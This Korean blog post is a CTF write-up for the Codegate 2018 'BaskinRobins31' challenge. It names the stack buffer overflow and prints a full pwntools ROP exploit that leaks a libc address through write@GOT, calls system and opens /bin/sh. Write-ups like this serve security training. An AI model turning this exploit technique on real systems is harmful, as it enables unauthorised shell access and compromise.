티스토리 뷰
checksec을 통해 확인해보면 Stack Canary가 풀려있는 것을 확인할 수 있고, 64bit 바이너리이다. 그 외의 값은 default 값이므로 중요하지 않다.
취약점은 매우 간단하다. 처음 입력 받는 함수에서 바로 stack buffer overflow 취약점이 존재한다. 따라서 여기서 Return Address를 덮는 것으로, 64bit ROP만 하면 끝난다.
exploit 코드
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 | #!/usr/bin/python from pwn import * def main(): elf = ELF("./BaskinRobins31") read_plt = elf.plt['read'] write_plt = elf.plt['write'] read_got = elf.got['read'] write_got = elf.got['write'] binsh = "/bin/sh\0" bss = 0x602110 pppr = 0x40087a pr = 0x400bc3 # s = remote("ch41l3ng3s.codegate.kr" ,3131) s = process("./BaskinRobins31") print s.recvuntil("How many numbers do you want to take ? (1-3)") payload = "A"*0xB8 payload += p64(pppr) payload += p64(0) payload += p64(bss) payload += p64(len(binsh)+16) payload += p64(read_plt) payload += p64(pppr) payload += p64(1) payload += p64(write_got) payload += p64(8) payload += p64(write_plt) payload += p64(pppr) payload += p64(0) payload += p64(write_got) payload += p64(8) payload += p64(read_plt) payload += p64(pr) payload += p64(bss) payload += p64(write_plt) payload += "AAAAAAAA" s.sendline(payload) s.interactive() s.sendline(binsh) write_real = u64(s.recvn(8)) print "real write : " + hex(write_real) libc_base = write_real - 0xf72b0 system_real = libc_base + 0x45390 s.sendline(p64(system_real)) s.interactive() s.close() if __name__ == '__main__': main() | cs |
'Wargame & CTF > CTF' 카테고리의 다른 글
| [Codegate 2018] Super Marimo (0) | 2018.02.05 |
|---|---|
| [Codegate 2018] RedVelvet (0) | 2018.02.05 |
| [Defcon 2017 예선] beatmeonthedl (0) | 2017.05.01 |
| [Defcon 2017 예선] smashme (0) | 2017.05.01 |
| [Code Gate 2017] Messenger (0) | 2017.02.16 |
댓글